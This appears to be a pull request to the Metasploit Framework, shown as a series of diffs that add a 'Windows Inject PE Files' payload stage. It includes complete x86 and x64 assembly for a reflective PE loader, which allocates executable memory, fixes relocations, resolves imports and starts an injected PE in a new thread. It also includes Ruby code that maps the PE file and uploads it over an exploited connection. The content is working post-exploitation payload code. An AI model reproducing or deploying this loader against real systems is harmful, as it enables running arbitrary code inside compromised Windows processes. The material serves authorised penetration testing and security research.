### PR TITLE
Reflective PE Payloads Added

### DIFF
--- a/lib/msf/core/payload/windows/peinject.rb
+++ b/lib/msf/core/payload/windows/peinject.rb
@@ -101,7 +101,7 @@ module Msf
       print_status("Mapped PE size #{pe_map[:bytes].length}")
       opts = {}
       opts[:is_dll] = pe_map[:is_dll]
-      opts[:exitfunk] = 'thread'
+      opts[:exitfunk] = datastore['EXITFUNC']
       p = encapsulate_reflective_stub(pe_map[:bytes], opts)
 
       print_status("Uploading reflective PE (#{p.length} bytes)...")

--- a/lib/msf/core/payload/windows/peinject.rb
+++ b/lib/msf/core/payload/windows/peinject.rb
@@ -1,0 +1,116 @@
+# -*- coding: binary -*-
+
+require 'msf/core/payload/windows'
+require 'msf/core/payload/windows/reflective_pe_loader'
+require 'msf/core/payload/windows/x64/reflective_pe_loader'
+
+module Msf
+
+  ###
+  #
+  # Reflective PE  module injects a custom native PE file into the exploited process using a relective PE loader stub
+  #
+  ###
+
+  module Payload::Windows::PEInject
+    include Msf::Payload::Windows::ReflectivePELoader
+    include Msf::Payload::Windows::ReflectivePELoader_x64
+    def initialize(info = {})
+      super
+      register_options([OptPath.new('PE', [ true, 'The local path to the PE file to upload' ]),], self.class)
+    end
+
+    #
+    # Returns the PE file path
+    #
+    def pe_path
+      datastore['PE']
+    end
+
+    #
+    # Transmits the reflective PE payload to the remote
+    # computer so that it can be loaded into memory.
+    #
+    def handle_connection(conn, _opts = {})
+      data = ''
+      begin
+        File.open(pe_path, 'rb') do |f|
+          data += f.read
+        end
+      rescue StandardError
+        print_error("Failed to load PE: #{$ERROR_INFO}.")
+        elog('Failed to load the PE file', error: e)
+        # TODO: exception
+        conn.close
+        return
+      end
+      print_status('Premapping PE file...')
+      mapped_pe = create_pe_memory_map(data, arch_to_s)
+      print_status("Mapped PE size #{mapped_pe.length}")
+      p = encapsulate_reflective_stub(mapped_pe, arch_to_s)
+      print_status("Uploading reflective PE (#{p.length} bytes)...")
+      # Send the size of the thing we're transferring
+      conn.put([ p.length ].pack('V'))
+      # Send the image name + image
+      conn.put(p)
+      print_status('Upload completed.')
+      conn.close
+    end
+
+    def encapsulate_reflective_stub(mapped_pe, arch)
+      call_size = mapped_pe.length + 5
+      reflective_loader = ''
+      if arch.eql?('x86')
+        reflective_loader = Metasm::Shellcode.assemble(Metasm::X86.new, "cld\ncall $+#{call_size}").encode_string
+        reflective_loader += mapped_pe
+        reflective_loader += Metasm::Shellcode.assemble(Metasm::X86.new, asm_reflective_pe_loader).encode_string
+      elsif arch.eql?('x64')
+        reflective_loader = Metasm::Shellcode.assemble(Metasm::X64.new, "cld\ncall $+#{call_size}").encode_string
+        reflective_loader += mapped_pe
+        reflective_loader += Metasm::Shellcode.assemble(Metasm::X64.new, asm_reflective_pe_loader_x64).encode_string
+      else
+        raise ArgumentError, "Unsupported architecture: #{arch}"
+      end
+      reflective_loader
+    end
+
+    def create_pe_memory_map(file, arch)
+      pe = Rex::PeParsey::Pe.new(Rex::ImageSource::Memory.new(file))
+      unless (arch.eql?('x86') && pe.ptr_32?) || (arch.eql?('x64') && pe.ptr_64?)
+        raise ArgumentError, "Selected PE file is not #{arch_to_s}"
+      end
+
+      # TODO: Add reflective CLR loading support
+      unless pe.hdr.opt['DataDirectory'][14].v['Size'] == 0
+        raise 'PE files with CLR is not currently supported'
+      end
+
+      unless pe.hdr.opt['DataDirectory'][5].v['Size'] != 0
+        raise 'PE file is missing relocation data'
+      end
+
+      pe_map = ''
+      offset = 0
+      virtual_offset = pe.image_base
+      vprint_status("ImageBase: 0x#{pe.image_base.to_s(16)}")
+      vprint_status("#{pe.sections.first.name} VMA: 0x#{(pe.image_base + pe.sections.first.vma).to_s(16)}")
+      vprint_status("#{pe.sections.first.name} Offset: 0x#{pe.sections.first.file_offset.to_s(16)}")
+      until offset == pe.sections.first.file_offset
+        pe_map << file[offset]
+        virtual_offset += 1
+        offset += 1
+      end
+
+      # Map PE sections
+      pe.sections.each do |sec|
+        pe_map << "\x00" * ((sec.vma + pe.image_base) - virtual_offset)
+        virtual_offset = sec.vma + pe.image_base
+        pe_map << sec.read(0, sec.raw_size)
+        virtual_offset += sec.raw_size
+        pe_map << "\x00" * ((sec.vma + pe.image_base + sec.size) - virtual_offset)
+        virtual_offset = sec.vma + pe.image_base + sec.size
+      end
+      pe_map
+    end
+  end
+end

--- a/lib/msf/core/payload/windows/peinject.rb
+++ b/lib/msf/core/payload/windows/peinject.rb
@@ -149,12 +149,7 @@ module Msf
         virtual_offset = sec.vma + pe.image_base + sec.size
       end
 
-      vprint_status("offset: 0x#{virtual_offset.to_s(16)} -> #{(pe.image_base + pe._optional_header.v['SizeOfImage']).to_s(16)}")
-      until virtual_offset >= pe.image_base + pe._optional_header.v['SizeOfImage']
-        pe_map[:bytes] << "\x00"
-        virtual_offset += 1
-      end
-
+      pe_map[:bytes] << "\x00" * ((pe.image_base + pe._optional_header.v['SizeOfImage']) - virtual_offset)
       pe_map
     end
   end

--- a/lib/msf/core/payload/windows/peinject.rb
+++ b/lib/msf/core/payload/windows/peinject.rb
@@ -130,6 +130,7 @@ module Msf
       offset = 0
       virtual_offset = pe.image_base
       vprint_status("ImageBase: 0x#{pe.image_base.to_s(16)}")
+      vprint_status("SizeOfImage: 0x#{pe._optional_header.v['SizeOfImage'].to_s(16)}")
       vprint_status("#{pe.sections.first.name} VMA: 0x#{(pe.image_base + pe.sections.first.vma).to_s(16)}")
       vprint_status("#{pe.sections.first.name} Offset: 0x#{pe.sections.first.file_offset.to_s(16)}")
       until offset == pe.sections.first.file_offset
@@ -147,6 +148,13 @@ module Msf
         pe_map[:bytes] << "\x00" * ((sec.vma + pe.image_base + sec.size) - virtual_offset)
         virtual_offset = sec.vma + pe.image_base + sec.size
       end
+
+      vprint_status("offset: 0x#{virtual_offset.to_s(16)} -> #{(pe.image_base + pe._optional_header.v['SizeOfImage']).to_s(16)}")
+      until virtual_offset >= pe.image_base + pe._optional_header.v['SizeOfImage']
+        pe_map[:bytes] << "\x00"
+        virtual_offset += 1
+      end
+
       pe_map
     end
   end

--- a/lib/msf/core/payload/windows/reflective_pe_loader.rb
+++ b/lib/msf/core/payload/windows/reflective_pe_loader.rb
@@ -20,9 +20,9 @@ start:                    ;
 	mov eax,[esi+0x3C]      ; Get the offset of "PE" to eax
 	mov ebx,[eax+esi+0x34]  ; Get the image base address to ebx
 	mov eax,[eax+esi+0x28]  ; Get the address of entry point to eax
-	push eax                ; Save the adress of entry to stack
+	push eax                ; Save the address of entry to stack
 	push 0x40               ; PAGE_EXECUTE_READ_WRITE
-	push 0x103000           ; MEM_COMMI | MEM_TOP_DOWN | MEM_RESERVE
+	push 0x103000           ; MEM_COMMIT | MEM_TOP_DOWN | MEM_RESERVE
 	push dword [esp+12]     ; dwSize
 	push 0x00               ; lpAddress
 	push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}         ; ror13( "kernel32.dll", "VirtualAlloc" )
@@ -140,7 +140,7 @@ complete:
 	pop eax                 ; Clean out the stack
 	pop edi
 	mov edx,edi             ; Copy the address of new base to EDX
-	pop eax                 ; Pop the addess_of_entry to EAX
+	pop eax                 ; Pop the address_of_entry to EAX
 	add edi,eax             ; Add the address of entry to new image base
 	pop ecx                 ; Pop the image_size to ECX
 memcpy:

--- a/lib/msf/core/payload/windows/reflective_pe_loader.rb
+++ b/lib/msf/core/payload/windows/reflective_pe_loader.rb
@@ -157,6 +157,7 @@ complete:
 memcpy:
 	mov al,[esi]            ; Move 1 byte of PE image to AL register
 	mov [edx],al            ; Move 1 byte of PE image to image base
+  mov [esi],0x00          ; Overwrite copied byte (for less memory footprint)
 	inc esi                 ; Increase PE image index
 	inc edx                 ; Increase image base index
 	loop memcpy             ; Loop until ECX = 0

--- a/lib/msf/core/payload/windows/reflective_pe_loader.rb
+++ b/lib/msf/core/payload/windows/reflective_pe_loader.rb
@@ -11,10 +11,10 @@ module Msf
       prologue = ''
       if opts[:is_dll] == true
         prologue = %(
-  push 0x00
-  push 0x01
-  push edi
-  sub [esp],eax
+  push edi                ; AOE
+  sub [esp],eax           ; hinstDLL
+  push 0x01               ; fdwReason
+  push 0x00               ; lpReserved
 )
       end
 

--- a/lib/msf/core/payload/windows/reflective_pe_loader.rb
+++ b/lib/msf/core/payload/windows/reflective_pe_loader.rb
@@ -1,0 +1,168 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/windows/block_api'
+
+module Msf
+  module Payload::Windows::ReflectivePELoader
+    include Payload::Windows::BlockApi
+    def asm_reflective_pe_loader
+      %^
+stub:
+	cld                     ; Clear direction flags
+  pop esi                 ; Get the address of image to esi
+	call $+5                ; Push the current EIP to stack
+	sub [esp],esi           ; Subtract &PE from EIP and get image_size
+	call start              ; Push the address of API to stack
+	#{asm_block_api}
+start:                    ;
+	pop ebp                 ; Get the address of api to ebp
+	mov eax,[esi+0x3C]      ; Get the offset of "PE" to eax
+	mov ebx,[eax+esi+0x34]  ; Get the image base address to ebx
+	mov eax,[eax+esi+0x28]  ; Get the address of entry point to eax
+	push eax                ; Save the adress of entry to stack
+	push 0x40               ; PAGE_EXECUTE_READ_WRITE
+	push 0x103000           ; MEM_COMMI | MEM_TOP_DOWN | MEM_RESERVE
+	push dword [esp+12]     ; dwSize
+	push 0x00               ; lpAddress
+	push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}         ; ror13( "kernel32.dll", "VirtualAlloc" )
+	call ebp                ; VirtualAlloc(lpAddress,dwSize,MEM_COMMIT|MEM_TOP_DOWN|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
+	push eax                ; Save the new image base to stack
+	xor edx,edx             ; Zero out the edx
+relocate:
+	mov eax,[esi+0x3C]      ; Offset to IMAGE_NT_HEADER ("PE")
+	mov ecx,[eax+esi+0xA4]  ; Base relocation table size
+	mov eax,[eax+esi+0xA0]  ; Base relocation table RVA
+	add eax,esi             ; Base relocation table memory address
+	add ecx,eax             ; End of base relocation table
+calc_delta:
+	mov edi,[esp]           ; Move the new base address to EDI
+	sub edi,ebx             ; Delta value
+	push dword [eax]        ; Reloc RVA
+	push dword [eax+4]      ; Reloc table size
+	add eax,0x08            ; Move to the reloc descriptor
+	jmp fix                 ; Start fixing
+get_rva:
+	cmp ecx,eax             ; Check if the end of the reloc section ?
+	jle reloc_fin           ; If yes goto fin
+	add esp,0x08            ; Deallocate old reloc RVA and reloc table size variables
+	push dword [eax]        ; Push new reloc RVA
+	push dword [eax+4]      ; Push new reloc table size
+	add eax,0x08            ; Move 8 bytes
+fix:
+	cmp word [esp],0x08     ; Check if the end of the reloc block
+	jz get_rva              ; If yes set the next block RVA
+	mov dx,word [eax]       ; Move the reloc desc to dx
+	cmp dx, 0x00            ; Check if it is a padding word
+	je pass
+	and dx,0x0FFF           ; Get the last 12 bits
+	add edx,[esp+4]         ; Add block RVA to desc value
+	add edx,esi             ; Add the start address of the image
+	add dword [edx],edi     ; Add the delta value to calculated absolute address
+pass:
+	sub dword [esp],0x02    ; Decrease the index
+	add eax,0x02            ; Move to the next reloc desc.
+	xor edx,edx             ; Zero out edx
+	jmp fix                 ; Loop
+reloc_fin:
+	pop eax                 ; Deallocate all vars
+	pop eax                 ; ...
+	mov eax,[esi+0x3C]      ; Offset to IMAGE_NT_HEADER ("PE")
+	mov eax,[eax+esi+0x80]  ; Import table RVA
+	add eax,esi             ; Import table memory address (first image import descriptor)
+	push eax                ; Save the address of import descriptor to stack
+get_modules:
+	cmp dword [eax],0x00    ; Check if the import names table RVA is NULL
+	jz complete             ; If yes building process is done
+	mov eax,[eax+0x0C]      ; Get RVA of dll name to eax
+	add eax,esi             ; Get the dll name address
+	call LoadLibraryA       ; Load the library
+	mov ebx,eax             ; Move the dll handle to ebx
+	mov eax,[esp]           ; Move the address of current _IMPORT_DESCRIPTOR to eax
+	call get_procs          ; Resolve all windows API function addresses
+	add dword [esp],0x14    ; Move to the next import descriptor
+	mov eax,[esp]           ; Set the new import descriptor address to eax
+	jmp get_modules
+get_procs:
+	push ecx                ; Save ecx to stack
+	push dword [eax+0x10]   ; Save the current import descriptor IAT RVA
+	add [esp],esi           ; Get the IAT memory address
+	mov eax,[eax]           ; Set the import names table RVA to eax
+	add eax,esi             ; Get the current import descriptor's import names table address
+	push eax                ; Save it to stack
+resolve:
+	cmp dword [eax],0x00    ; Check if end of the import names table
+	jz all_resolved         ; If yes resolving process is done
+	mov eax,[eax]           ; Get the RVA of function hint to eax
+	cmp eax,0x80000000      ; Check if the high order bit is set
+	js name_resolve         ; If high order bit is not set resolve with INT entry
+	sub eax,0x80000000      ; Zero out the high bit
+	call GetProcAddress     ; Get the API address with hint
+	jmp insert_iat          ; Insert the address of API tı IAT
+name_resolve:
+	add eax,esi             ; Set the address of function hint
+	add eax,0x02            ; Move to function name
+	call GetProcAddress     ; Get the function address to eax
+insert_iat:
+	mov ecx,[esp+4]         ; Move the IAT address to ecx
+	mov [ecx],eax           ; Insert the function address to IAT
+	add dword [esp],0x04    ; Increase the import names table index
+	add dword [esp+4],0x04  ; Increase the IAT index
+	mov eax,[esp]           ; Set the address of import names table address to eax
+	jmp resolve             ; Loop
+all_resolved:
+	mov ecx,[esp+4]         ; Move the IAT address to ecx
+	mov dword [ecx],0x00    ; Insert a NULL dword
+	pop ecx                 ; Deallocate index values
+	pop ecx                 ; ...
+	pop ecx                 ; Put back the ecx value
+	ret                     ; <-
+LoadLibraryA:
+	push ecx                ; Save ecx to stack
+	push edx                ; Save edx to stack
+	push eax                ; Push the address of linrary name string
+	push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}         ; ror13( "kernel32.dll", "LoadLibraryA" )
+	call ebp                ; LoadLibraryA([esp+4])
+	pop edx                 ; Retreive edx
+	pop ecx                 ; Retreive ecx
+	ret                     ; <-
+GetProcAddress:
+	push ecx                ; Save ecx to stack
+	push edx                ; Save edx to stack
+	push eax                ; Push the address of proc name string
+	push ebx                ; Push the dll handle
+	push #{Rex::Text.block_api_hash('kernel32.dll', 'GetProcAddress')}         ; ror13( "kernel32.dll", "GetProcAddress" )
+	call ebp                ; GetProcAddress(ebx,[esp+4])
+	pop edx                 ; Retrieve edx
+	pop ecx                 ; Retrieve ecx
+	ret                     ; <-
+complete:
+	pop eax                 ; Clean out the stack
+	pop edi
+	mov edx,edi             ; Copy the address of new base to EDX
+	pop eax                 ; Pop the addess_of_entry to EAX
+	add edi,eax             ; Add the address of entry to new image base
+	pop ecx                 ; Pop the image_size to ECX
+memcpy:
+	mov al,[esi]            ; Move 1 byte of PE image to AL register
+	mov [edx],al            ; Move 1 byte of PE image to image base
+	inc esi                 ; Increase PE image index
+	inc edx                 ; Increase image base index
+	loop memcpy             ; Loop until ECX = 0
+CreateThread:
+	xor eax,eax             ; Zero out the eax
+	push eax                ; lpThreadId
+	push eax                ; dwCreationFlags
+	push eax                ; lpParameter
+	push edi                ; lpStartAddress
+	push eax                ; dwStackSize
+	push eax                ; lpThreadAttributes
+	push #{Rex::Text.block_api_hash('kernel32.dll', 'CreateThread')}         ; ror13( "kernel32.dll","CreateThread" )
+	call ebp                ; CreateThread( NULL, 0, &threadstart, NULL, 0, NULL );
+fin:
+	nop                     ; Chill ;)
+	jmp fin                 ; To infinity and beyond !
+      ^
+    end
+  end
+end

--- a/lib/msf/core/payload/windows/x64/reflective_pe_loader.rb
+++ b/lib/msf/core/payload/windows/x64/reflective_pe_loader.rb
@@ -15,13 +15,13 @@ stub:
 	sub [rsp],rsi                   ; Subtract the address of pre mapped PE image and get the image_size to R11
 	call start                      ; Call start
 	#{asm_block_api}
-start:                              ;
+start:                            ;
 	pop rbp                         ; Get the address of hook_api to rbp
 	mov eax,dword [rsi+0x3C]        ; Get the offset of "PE" to eax
 	mov rbx,qword [rax+rsi+0x30]    ; Get the image base address to rbx
 	mov r12d,dword [rax+rsi+0x28]   ; Get the address of entry point to r12
 	mov r9d,0x40                    ; PAGE_EXECUTE_READ_WRITE
-	mov r8d,0x00103000              ; MEM_COMMI | MEM_TOP_DOWN | MEM_RESERVE
+	mov r8d,0x00103000              ; MEM_COMMIT | MEM_TOP_DOWN | MEM_RESERVE
 	mov rdx,[rsp]                   ; dwSize
 	xor rcx,rcx                     ; lpAddress
 	mov r10d,#{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}             ; hash( "kernel32.dll", "VirtualAlloc" )
@@ -118,7 +118,7 @@ LoadLibraryA:
 	mov r10d,#{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}             ; ror13( "kernel32.dll", "LoadLibraryA" )
 	call rbp                        ; LoadLibraryA([esp+4])
 	add rsp,32                      ; Fix the stack
-	pop rcx                         ; Retreive ecx
+	pop rcx                         ; Retrieve ecx
 	ret                             ; <-
 GetProcAddress:
 	mov rcx,r13                     ; Move the module handle to RCX as first parameter
@@ -144,7 +144,7 @@ CreateThread:
 	push rax                        ; lpThreadId
 	push rax                        ; dwCreationFlags
 	mov r9,rax                      ; lpParameter
-	mov r8,r13                      ; lpstartAddress
+	mov r8,r13                      ; lpStartAddress
  	mov rdx,rax                     ; dwStackSize
 	mov rcx,rax                     ; lpThreadAttributes
 	mov r10d,#{Rex::Text.block_api_hash('kernel32.dll', 'CreateThread')}             ; ror13( "kernel32.dll","CreateThread" )

--- a/lib/msf/core/payload/windows/x64/reflective_pe_loader.rb
+++ b/lib/msf/core/payload/windows/x64/reflective_pe_loader.rb
@@ -1,0 +1,159 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/windows/x64/block_api'
+
+module Msf
+  module Payload::Windows::ReflectivePELoader_x64
+    include Payload::Windows::BlockApi_x64
+    def asm_reflective_pe_loader_x64
+      %^
+stub:
+	cld                             ; Clear direction flags
+	pop rsi                         ; Get the address of image to rsi
+	call $+5                        ; Push the current RIP value to stack
+	sub [rsp],rsi                   ; Subtract the address of pre mapped PE image and get the image_size to R11
+	call start                      ; Call start
+	#{asm_block_api}
+start:                              ;
+	pop rbp                         ; Get the address of hook_api to rbp
+	mov eax,dword [rsi+0x3C]        ; Get the offset of "PE" to eax
+	mov rbx,qword [rax+rsi+0x30]    ; Get the image base address to rbx
+	mov r12d,dword [rax+rsi+0x28]   ; Get the address of entry point to r12
+	mov r9d,0x40                    ; PAGE_EXECUTE_READ_WRITE
+	mov r8d,0x00103000              ; MEM_COMMI | MEM_TOP_DOWN | MEM_RESERVE
+	mov rdx,[rsp]                   ; dwSize
+	xor rcx,rcx                     ; lpAddress
+	mov r10d,#{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}             ; hash( "kernel32.dll", "VirtualAlloc" )
+	call rbp                        ; VirtualAlloc(lpAddress,dwSize,MEM_COMMIT|MEM_TOP_DOWN|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
+	add rsp,0x20                    ; Clear stack
+	mov rdi,rax                     ; Save the new base address to rdi
+	xor rax,rax                     ; Zero out the RAX
+	xor r8,r8                       ; Zero out the R8
+	xor r13,r13                     ; Zero out the R13
+	xor r14,r14                     ; Zero out the R14
+	mov eax,dword [rsi+0x3C]        ; Offset to IMAGE_NT_HEADER ("PE")
+	mov ecx,dword [rax+rsi+0xB4]    ; Base relocation table size
+	mov eax,dword [rax+rsi+0xB0]    ; Base relocation table RVA
+	add rax,rsi                     ; Base relocation table memory address
+	add rcx,rax                     ; End of base relocation table
+calc_delta:
+	mov rdx,rdi                     ; Move the new base address to rdx
+	sub rdx,rbx                     ; Delta value
+	mov r13d,dword [rax]            ; Move the reloc RVA to R13D
+	mov r14d,dword [rax+4]          ; Move the reloc table size to R14D
+	add rax,0x08                    ; Move to the reloc descriptor
+	jmp fix                         ; Start fixing
+get_rva:
+	cmp rcx,rax                     ; Check if the end of the reloc section
+	jle reloc_fin                   ; If yes goto fin
+	mov r13d,dword [rax]            ; Move the new reloc RVA
+	mov r14d,dword [rax+4]          ; Move the new reloc table size
+	add rax,0x08                    ; Move 8 bytes
+fix:
+	cmp r14w,0x08                   ; Check if the end of the reloc block
+	jz get_rva                      ; If yes set the next block RVA
+	mov r8w,word [rax]              ; Move the reloc desc to r8w
+	cmp r8w, 0x00                   ; Check if it is a padding word
+	je pass
+	and r8w,0x0FFF                  ; Get the last 12 bits
+	add r8d,r13d                    ; Add block RVA to desc value
+	add r8,rsi                      ; Add the start address of the image
+	add [r8],rdx                    ; Add the delta value to calculated absolute address
+pass:
+	sub r14d,0x02                   ; Decrease the index
+	add rax,0x02                    ; Move to the next reloc desc.
+	xor r8,r8                       ; Zero out r8
+	jmp fix                         ; Loop
+reloc_fin:                        ; All done !
+	xor r14,r14
+	xor r15,r15
+	mov eax,dword [rsi+0x3C]        ; Offset to IMAGE_NT_HEADER ("PE")
+	mov eax,dword [rax+rsi+0x90]    ; Import table RVA
+	add rax,rsi                     ; Import table memory address (first image import descriptor)
+	push rax                        ; Save import descriptor to stack
+get_modules:
+	cmp dword [rax],0               ; Check if the import names table RVA is NULL
+	jz complete                     ; If yes building process is done
+	mov eax,dword [rax+0x0C]        ; Get RVA of dll name to eax
+	add rax,rsi                     ; Get the dll name address
+	call LoadLibraryA               ; Load the library
+	mov r13,rax                     ; Move the dll handle to R13
+	mov rax,[rsp]                   ; Move the address of current _IMPORT_DESCRIPTOR to eax
+	call get_procs                  ; Resolve all windows API function addresses
+	add dword [rsp],0x14            ; Move to the next import descriptor
+	mov rax,[rsp]                   ; Set the new import descriptor address to eax
+	jmp get_modules
+get_procs:
+	mov r14d,dword [rax+0x10]       ; Save the current import descriptor IAT RVA
+	add r14,rsi                     ; Get the IAT memory address
+	mov rax,[rax]                   ; Set the import names table RVA to eax
+	add rax,rsi                     ; Get the current import descriptor's import names table address
+	mov r15,rax                     ; Save &INT to R15
+resolve:
+	cmp dword [rax],0x00            ; Check if end of the import names table
+	jz all_resolved                 ; If yes resolving process is done
+	mov rax,[rax]                   ; Get the RVA of function hint to eax
+	cmp eax,0x80000000              ; Check if the high order bit is set
+	js name_resolve                 ; If high order bit is not set resolve with INT entry
+	sub eax,0x80000000              ; Zero out the high bit
+	call GetProcAddress             ; Get the API address with hint
+	jmp insert_iat                  ; Insert the address of API tı IAT
+name_resolve:
+	add rax,rsi                     ; Set the address of function hint
+	add rax,0x02                    ; Move to function name
+	call GetProcAddress             ; Get the function address to eax
+insert_iat:
+	mov [r14],rax                   ; Insert the function address to IAT
+	add r14,0x08                    ; Increase the IAT index
+	add r15,0x08                    ; Increase the import names table index
+	mov rax,r15                     ; Set the address of import names table address to eax
+	jmp resolve                     ; Loop
+all_resolved:
+	mov qword [r14],0x00            ; Insert a NULL dword
+	ret                             ; <-
+LoadLibraryA:
+	push rcx                        ; Save ecx to stack
+	mov rcx,rax                     ; Move the address of library name string to RCX
+	mov r10d,#{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}             ; ror13( "kernel32.dll", "LoadLibraryA" )
+	call rbp                        ; LoadLibraryA([esp+4])
+	add rsp,32                      ; Fix the stack
+	pop rcx                         ; Retreive ecx
+	ret                             ; <-
+GetProcAddress:
+	mov rcx,r13                     ; Move the module handle to RCX as first parameter
+	mov rdx,rax                     ; Move the address of function name string to RDX as second parameter
+	mov r10d,#{Rex::Text.block_api_hash('kernel32.dll', 'GetProcAddress')}             ; ror13( "kernel32.dll", "GetProcAddress" )
+	call rbp                        ; GetProcAddress(ebx,[esp+4])
+	add rsp,24                      ; Fix the stack
+	pop rcx                         ; ...
+	ret                             ; <-
+complete:
+	pop rax                         ; Clean out the stack
+	pop rcx                         ; Pop the image_size into RCX
+	mov r13,rdi                     ; Copy the new base value to rbx
+	add r13,r12                     ; Add the address of entry value to new base address
+memcpy:
+	mov al,[rsi]                    ; Move 1 byte of PE image to AL register
+	mov [rdi],al                    ; Move 1 byte of PE image to image base
+	inc rsi                         ; Increase PE image index
+	inc rdi                         ; Increase image base index
+	loop memcpy                     ; Loop until zero
+CreateThread:
+	xor rax,rax                     ; Zero out the eax
+	push rax                        ; lpThreadId
+	push rax                        ; dwCreationFlags
+	mov r9,rax                      ; lpParameter
+	mov r8,r13                      ; lpstartAddress
+ 	mov rdx,rax                     ; dwStackSize
+	mov rcx,rax                     ; lpThreadAttributes
+	mov r10d,#{Rex::Text.block_api_hash('kernel32.dll', 'CreateThread')}             ; ror13( "kernel32.dll","CreateThread" )
+	call rbp                        ; CreateThread( NULL, 0, &threadstart, NULL, 0, NULL );
+  jmp end                         ; <-
+end:
+	nop                             ; Chill ;)
+	jmp end                         ; Loop !
+      ^
+    end
+  end
+end

--- a/lib/msf/core/payload/windows/x64/reflective_pe_loader.rb
+++ b/lib/msf/core/payload/windows/x64/reflective_pe_loader.rb
@@ -176,7 +176,7 @@ PE_start:
   #{prologue}
   call r9                         ; Call the AOE
   mov rcx,0x00                    ; dwExitCode
-  mov r10d,#{'0x%.8x' % Msf::Payload::Windows.exit_types[opts[:exitfunnrk]]}
+  mov r10d,#{'0x%.8x' % Msf::Payload::Windows.exit_types[opts[:exitfunk]]}
   call api_call                   ; Call exit funk based on exit_type
       ^
     end

--- a/lib/msf/core/payload/windows/x64/reflective_pe_loader.rb
+++ b/lib/msf/core/payload/windows/x64/reflective_pe_loader.rb
@@ -11,9 +11,9 @@ module Msf
       prologue = ''
       if opts[:is_dll] == true
         prologue = %(
-  mov rcx,0x00
-  mov rdx,0x01
-  mov r8,r13
+  mov rcx,r13                     ; hinstDLL
+  mov rdx,0x01                    ; fdwReason
+  xor r8,r8                       ; lpReserved
       )
       end
 

--- a/modules/payloads/stages/windows/peinject.rb
+++ b/modules/payloads/stages/windows/peinject.rb
@@ -2,7 +2,9 @@
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
+#
 require 'msf/core/payload/windows/peinject'
+require 'msf/core/payload/windows/reflective_pe_loader'
 
 ###
 #

--- a/modules/payloads/stages/windows/peinject.rb
+++ b/modules/payloads/stages/windows/peinject.rb
@@ -1,0 +1,42 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'msf/core/payload/windows/peinject'
+
+###
+#
+# Injects an arbitrary PE file in the exploited process via reflective PE loader.
+#
+###
+module MetasploitModule
+  include Msf::Payload::Windows
+  include Msf::Payload::Windows::PEInject
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows Inject PE Files',
+        'Description' => %q{
+          Inject a custom native PE file into the exploited process using a relective PE loader stub.
+          Reflective PE payload will be started in a new thread inside the target process.
+        },
+        'Author' =>
+            [
+              'ege <egebalci[at]pm.me>'
+            ],
+        'License' => MSF_LICENSE,
+        'Platform' => 'win',
+        'Arch' => ARCH_X86,
+        'References' =>
+            [
+              'https://github.com/EgeBalci/Amber'
+            ],
+        'PayloadCompat' =>
+            {
+              'Convention' => 'sockedi handleedi -http -https'
+            }
+      )
+    )
+  end
+end

--- a/modules/payloads/stages/windows/peinject.rb
+++ b/modules/payloads/stages/windows/peinject.rb
@@ -45,13 +45,10 @@ module MetasploitModule
     )
   end
 
-  def encapsulate_reflective_stub(mapped_pe)
+  def encapsulate_reflective_stub(mapped_pe, opts)
     call_size = mapped_pe.length + 5
-
     reflective_loader = Metasm::Shellcode.assemble(Metasm::X86.new, "cld\ncall $+#{call_size}").encode_string
     reflective_loader += mapped_pe
-    reflective_loader += Metasm::Shellcode.assemble(Metasm::X86.new, asm_reflective_pe_loader).encode_string
-
-    reflective_loader
+    reflective_loader += Metasm::Shellcode.assemble(Metasm::X86.new, asm_reflective_pe_loader(opts)).encode_string
   end
 end

--- a/modules/payloads/stages/windows/peinject.rb
+++ b/modules/payloads/stages/windows/peinject.rb
@@ -41,6 +41,10 @@ module MetasploitModule
         'PayloadCompat' =>
           {
             'Convention' => 'sockedi handleedi -http -https'
+          },
+        'DefaultOptions' =>
+          {
+            'EXITFUNC' => 'thread'
           }
       )
     )

--- a/modules/payloads/stages/windows/peinject.rb
+++ b/modules/payloads/stages/windows/peinject.rb
@@ -22,9 +22,10 @@ module MetasploitModule
         info,
         'Name' => 'Windows Inject PE Files',
         'Description' => %q{
-          Inject a custom native PE file into the exploited process using a reflective PE loader. Reflective PE payload
-          will be started in a new thread inside the target process. This module requires a PE file which contains
-          relocation data.
+          Inject a custom native PE file into the exploited process using a reflective PE loader. Reflective PE loader will
+          execute the pre-mapped PE image starting from the address of entry after perform image base relocation and API address resolution.
+          This module requires a PE file that contains relocation data and a valid(uncorrupted) import table. PE files with CLR(C#/.NET executables),
+          bounded imports, and TLS callbacks are not currently supported. Also, PE file witch uses resource loading might crash.
         },
         'Author' =>
           [
@@ -49,6 +50,6 @@ module MetasploitModule
     call_size = mapped_pe.length + 5
     reflective_loader = Metasm::Shellcode.assemble(Metasm::X86.new, "cld\ncall $+#{call_size}").encode_string
     reflective_loader += mapped_pe
-    reflective_loader += Metasm::Shellcode.assemble(Metasm::X86.new, asm_reflective_pe_loader(opts)).encode_string
+    reflective_loader + Metasm::Shellcode.assemble(Metasm::X86.new, asm_reflective_pe_loader(opts)).encode_string
   end
 end

--- a/modules/payloads/stages/windows/peinject.rb
+++ b/modules/payloads/stages/windows/peinject.rb
@@ -52,7 +52,7 @@ module MetasploitModule
 
   def encapsulate_reflective_stub(mapped_pe, opts)
     call_size = mapped_pe.length + 5
-    reflective_loader = Metasm::Shellcode.assemble(Metasm::X86.new, "cld\ncall $+#{call_size}").encode_string
+    reflective_loader = Metasm::Shellcode.assemble(Metasm::X86.new, "call $+#{call_size}").encode_string
     reflective_loader += mapped_pe
     reflective_loader + Metasm::Shellcode.assemble(Metasm::X86.new, asm_reflective_pe_loader(opts)).encode_string
   end

--- a/modules/payloads/stages/windows/peinject.rb
